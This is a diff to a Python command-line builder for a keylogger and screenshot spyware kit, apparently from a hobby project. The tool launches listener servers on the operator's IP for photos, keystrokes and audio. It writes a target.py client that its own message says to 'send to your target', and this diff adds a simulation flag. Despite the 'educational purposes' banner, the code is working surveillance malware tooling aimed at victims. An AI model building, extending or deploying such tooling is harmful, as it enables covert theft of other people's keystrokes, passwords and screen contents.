@@ -17,13 +17,14 @@ gui = """
                         REMINDER THIS WAS BUILD FOR EDUCATIONAL PURPOSES
                         SO DON'T USE THIS FOR EVIL ACTIVITIES
 """
-print(gui)
 lst = sys.argv
 
 try:
     if "-aip" in lst: #"aip" stands for address ip
         idx = lst.index("-aip")
         try:
+            global simulation
+            global boolean
             ipaddress = str(lst[idx+1])
             zahlen = "123456789"
             nummer = 0
@@ -37,19 +38,34 @@ try:
             port_keylogger = int(port_numbers[1])
             port_listener = int(port_numbers[2])
             port_time = int(port_numbers[3])
+
+            if "-sim" in lst:
+                try:
+                    print("The simulation is activated")
+                    simulation = "simulater=True"
+                    boolean = True
+
+                except IndexError:
+                    quit()
+            else:
+                simulation = "simulater=False"
+                boolean = False
+
             if "-ds" in lst:  # "ds" for demon server
                 try:
                     server_code = f'''
 import KeyloggerScreenshot as ks 
 import threading
 
-server_photos = ks.ServerPhotos("{ipaddress}", {port_photos})
+ip = "{ipaddress}"
 
-server_keylogger = ks.ServerKeylogger("{ipaddress}", {port_keylogger})
+server_photos = ks.ServerPhotos(ip, {port_photos})
 
-server_listener = ks.ServerListener("{ipaddress}", {port_listener})
+server_keylogger = ks.ServerKeylogger(ip, {port_keylogger}, {simulation})
 
-server_time = ks.Timer("{ipaddress}", {port_time})
+server_listener = ks.ServerListener(ip, {port_listener})
+
+server_time = ks.Timer(ip, {port_time})
 
 threading_server = threading.Thread(target=server_photos.start)
 threading_server.start()
@@ -86,11 +102,13 @@ threading_server4.start() '''
                 idx_s = lst.index("-s")
                 try:
                     if "-" in lst[idx_s+1]:
+                        print(gui)
                         print("PLEASE SPECIFY YOUR SECONDS -s")
                         quit()
 
                     seconds = int(lst[idx_s + 1])
                     if seconds < 60:
+                        print(gui)
                         print(f"SECONDS MUST BE GREATER THAN 60")
                         quit()
 
@@ -112,17 +130,17 @@ threading_server4.start() '''
                         os.remove(filename)
 
                     with open(f"{filename}", "a+") as file:
-                        file.write(f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener},ip, {port_time}, duration_in_seconds={seconds}) \nkey_client.start()")
+                        file.write(f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}) \nkey_client.start()")
                     print(f"{filename.upper()} has been created")
 
                 except IndexError:
                     with open("target.py", "a+") as file:
-                        file.write(f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener},ip, {port_time}, duration_in_seconds={seconds}) \nkey_client.start()")
+                        file.write(f"import KeyloggerScreenshot as ks \n\nip = '{ipaddress}'\nkey_client = ks.KeyloggerTarget(ip, {port_photos}, ip, {port_keylogger}, ip, {port_listener}, ip, {port_time}, duration_in_seconds={seconds}) \nkey_client.start()")
                     print("TARGET.PY HAS BEEN CREATED YOU CAN SEND THIS TO YOUR TARGET")
 
             server_photos = ks.ServerPhotos(ipaddress, port_photos)
 
-            server_keylogger = ks.ServerKeylogger(ipaddress, port_keylogger)
+            server_keylogger = ks.ServerKeylogger(ipaddress, port_keylogger, simulater=boolean)
 
             server_listener = ks.ServerListener(ipaddress, port_listener)
 
@@ -131,23 +149,27 @@ threading_server4.start() '''
             threading_server = threading.Thread(target=server_photos.start)
             threading_server.start()
 
-            threading_server2 = threading.Thread(target=server_keylogger.start)
-            threading_server2.start()
-
             threading_server3 = threading.Thread(target=server_listener.start)
             threading_server3.start()
 
             threading_server4 = threading.Thread(target=server_time.start_timer)
             threading_server4.start()
 
+            threading_server2 = threading.Thread(target=server_keylogger.start)
+            threading_server2.start()
+            threading_server2.join()
+
         except IndexError:
+            print(gui)
             print("YOU FORGET TO INSERT YOUR IP")
 
     elif "-aip" not in lst and "-help" not in lst:
+        print(gui)
         print("PLEASE INSERT YOUR IP WITH -aip")
 
     if "-help" in lst:
-        print("-aip INSERT THE SERVERS IP\n-s   SPECIFY YOUR SECONDS (DEFAULT 60 SECONDS)\n-cf  CREATES TARGET FILE WHICH YOU SEND TO ANY TARGET\n-p   SAVES ALL THE PORTS OF THE CURRENT SERVER\n-ds  CREATES A SERVER WITH THE SAME PORTS AS THE TARGET")
+        print(gui)
+        print("\n-aip INSERT THE SERVERS IP\n-s   SPECIFY YOUR SECONDS (DEFAULT 60 SECONDS)\n-cf  CREATES TARGET FILE WHICH YOU SEND TO ANY TARGET\n-p   SAVES ALL THE PORTS OF THE CURRENT SERVER\n-ds  CREATES A SERVER WITH THE SAME PORTS AS THE TARGET\n-sim ACTIVATES SIMULATION")
 
 except OSError:
     print("CHECK YOUR IP-ADDRESS")
